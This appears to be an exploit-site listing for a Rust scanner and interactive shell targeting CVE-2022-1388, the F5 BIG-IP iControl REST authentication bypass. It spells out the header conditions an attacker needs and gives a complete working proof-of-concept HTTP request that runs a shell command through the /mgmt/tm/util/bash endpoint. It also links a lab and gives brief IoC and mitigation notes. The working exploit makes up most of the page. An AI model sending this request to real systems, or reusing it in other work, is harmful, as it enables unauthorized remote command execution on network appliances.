## https://sploitus.com/exploit?id=DDAC4C84-E26E-5729-B325-4ED0A6FF550D
# CVE-2022-1388-rs
Scanner and Interactive shell for CVE-2022-1388 F5 BIG-IP iControl REST Auth Bypass RCE written in Rust
## Summary
To wrap things up here is an overview of the necessary conditions of a request for exploiting this vulnerability:
- Connection header must include X-F5-Auth-Token
- X-F5-Auth-Token header must be present
- Host header must be localhost / 127.0.0.1 or the Connection header must include X-Forwarded-Host
- Auth header must be set with the admin username and any password
## PoC
```
POST /mgmt/tm/util/bash HTTP/1.1
Host: 127.0.0.1
Authorization: Basic YWRtaW46aG9yaXpvbjM=
X-F5-Auth-Token: thisisrandomstring
User-Agent: curl/7.82.0
Connection: X-F5-Auth-Token
Accept: */*
Content-Length: 39
{
"command":"run",
"utilCmdArgs":"-c id"
}
```
# Setup LAB
- You can find the lab <a href="https://github.com/XmasSnowISBACK/CVE-2022-1388/tree/main/LAB-PoC">Here</a>
## Usage
## Requirements
- Rust
- Cargo
## IoCs
IOCs can be found in the `/var/log/audit` log file. Unrecognized commands executed by the `mgmt/tm/util/bash` endpoint should be cause for concern.
## Mitigation
Update to the latest version or mitigate by following the instructions within the F5 Security Advisory
- https://support.f5.com/csp/article/K23605346
## References
- https://www.horizon3.ai/f5-icontrol-rest-endpoint-authentication-bypass-technical-deep-dive/